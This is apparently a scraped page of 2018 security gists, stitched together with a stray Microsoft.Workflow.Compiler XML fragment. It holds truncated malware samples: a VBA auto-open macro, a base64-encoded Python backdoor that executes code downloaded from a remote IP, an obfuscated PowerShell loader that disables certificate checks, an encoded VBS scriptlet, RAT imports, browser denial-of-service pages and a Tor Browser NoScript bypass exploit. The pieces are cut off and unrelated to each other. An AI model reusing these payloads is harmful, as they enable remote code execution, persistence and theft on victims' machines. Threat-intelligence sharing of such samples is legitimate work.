
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>test.xoml</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
seclib / dfcfbvgd454gn56h4yh8
Created August 23, 2018 13:51
VBA + PS1 threat
## upload by @satya_enki
## VBA:
Private Sub WorkBook_Open()
Call VVVV
Application.Wait (Now + TimeValue("0:00:10"))
Call AAAA
seclib / dfhgtyujutqzoiaeoi
Created August 28, 2018 05:04
Python backdoor
## Hash: 9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22
## VT Link: https://www.virustotal.com/#/file/9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22/detection
var1 = '''aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm'''
import re
# Matches everything between two texts, returns the first match, Returns: str or False
var2 = '''8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xOTIuMTY4LjQyLjI0MDo0NDMvTjdBOFJaNnRnLVlYSndJelRLWkJGd2o1S0JxZDJmYTQtdWtnaURua0RlQ3AxM3R0MWJGN
seclib / ps1_file
Created August 28, 2018 05:10
2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132
## Hash: 2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132
## VT Link: https://www.virustotal.com/#/file/2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132/detection
## Original file
$YHRIul = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("MTYyLjI0NC4zMi4xNDg="))
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$gxPVX = [System.Convert]::FromBase64String("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
seclib / hgdhsfhgdjgoyikho
Created August 31, 2018 07:07
VBS COM Scriptlet threat
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
q=115
w="125128225226220231214225232185147215225216125128210231147176147170218125128217220147215225216125128149149147176147210231125128216230223216125128223223212215212216229161229229216215231230161165214147176147210231125128225216219231147224212216229231230217226215225216231212161229229216215231230161165214147231226225147217220216230223216125128223223212215212216229161231232226215231230161165214147176147210231125128225216219231147224212216229231230217226215225216231212161231232226215231230161165214147231226225147217220125128156171220147153147149147214162147152214216227230224226214152149155147214216235216161170229147176147165214147231216230125128210231159165214159166235147224220215125128156171220155147170218147225226220231214225232217125128213232230147215225216125128164220147229216215223226217216231216223216215161164234125128164220147216223220217216
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from PIL import ImageGrab # /capture_pc
from shutil import copyfile, copyfileobj, rmtree, move # /ls, /pwd, /cd, /copy, /mv
from sys import argv, path, stdout # console output
from json import loads # reading json from ipinfo.io
from winshell import startup # persistence
from tendo import singleton # this makes the application exit if there's another instance already running
from win32com.client import Dispatch # WScript.Shell
seclib / ubDoS.html
Created September 11, 2018 15:26
Universal Browser DoS
<title>Title / History</title>
<script>
if (navigator.userAgent.indexOf('Chrome') == -1 && navigator.userAgent.indexOf('Safari') > -1) {
if(!String.prototype.repeat){(function(){'use strict';
var defineProperty=(function(){try{var object={};
var $defineProperty=Object.defineProperty;
var result=$defineProperty(object,object,object)&&$defineProperty}catch(error){}return result}());
var repeat=function(count){if(this==null){throw TypeError()}
var string=String(this);
seclib / torbb.py
Created September 11, 2018 16:47
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
# Module-level port constant. Presumably the TCP port the HTTPServer imported
# above is bound to; the code that uses it is outside this preview (confirm).
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
seclib / seclib_safary_dead.html
Created September 17, 2018 12:51
Safari DoS ☠️
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style>
body {
background: repeat url('data:image/jpeg;base64,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
seclib / ccddef1beae0d1c7962b1783003
Created September 21, 2018 06:27
VBA XLS Threat
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MAS-H--- 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
===============================================================================
FILE: 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'